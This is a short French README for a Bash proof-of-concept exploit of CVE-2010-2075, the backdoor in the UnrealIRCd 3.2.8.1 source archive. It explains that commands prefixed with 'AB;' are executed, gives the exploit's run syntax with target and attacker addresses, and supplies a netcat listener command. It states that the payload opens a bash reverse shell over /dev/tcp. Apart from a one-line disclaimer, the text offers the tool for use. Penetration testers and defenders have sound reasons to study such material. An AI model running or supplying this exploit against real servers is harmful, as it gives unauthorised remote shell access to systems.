
CVE-2010-2075 exploit
PoC Bash pour la backdoor introduite dans l'archive source d'UnrealIRCd 3.2.8.1.
Le binaire compromis exécute des commandes arbitraires précédées de AB; envoyées sur le port IRC.
chmod +x exploit.sh
./exploit.sh <RHOST> <RPORT> <LHOST> <LPORT>
Exemple :
./exploit.sh 192.168.1.10 6667 192.168.1.20 4444
Configurez un écouteur avant d'exécuter :
nc -lvnp 4444
La backdoor vérifie les données entrantes pour le préfixe AB; et transmet le reste au shell système. La charge utile envoie un shell inverse bash via /dev/tcp.
Pour une utilisation éducative et des tests autorisés uniquement.